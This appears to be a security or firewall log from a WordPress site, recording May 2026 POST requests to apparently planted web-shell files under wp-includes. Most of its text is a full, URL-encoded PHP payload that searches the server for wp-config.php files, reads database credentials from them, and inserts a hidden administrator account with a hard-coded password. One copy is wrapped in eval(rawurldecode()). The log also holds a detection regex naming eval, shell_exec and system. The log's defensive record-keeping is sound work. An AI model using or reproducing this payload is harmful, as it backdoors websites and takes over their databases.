%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 18:09:15","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Zv:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php HTTP\/1.1\ncontent-length:12640\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\ncookie:4=16a08a6222d8eba60e9d2af882976b3e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvJaLvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOip3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nZv=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:09:40","213.209.159.254","POST","\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> urOhQZ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%2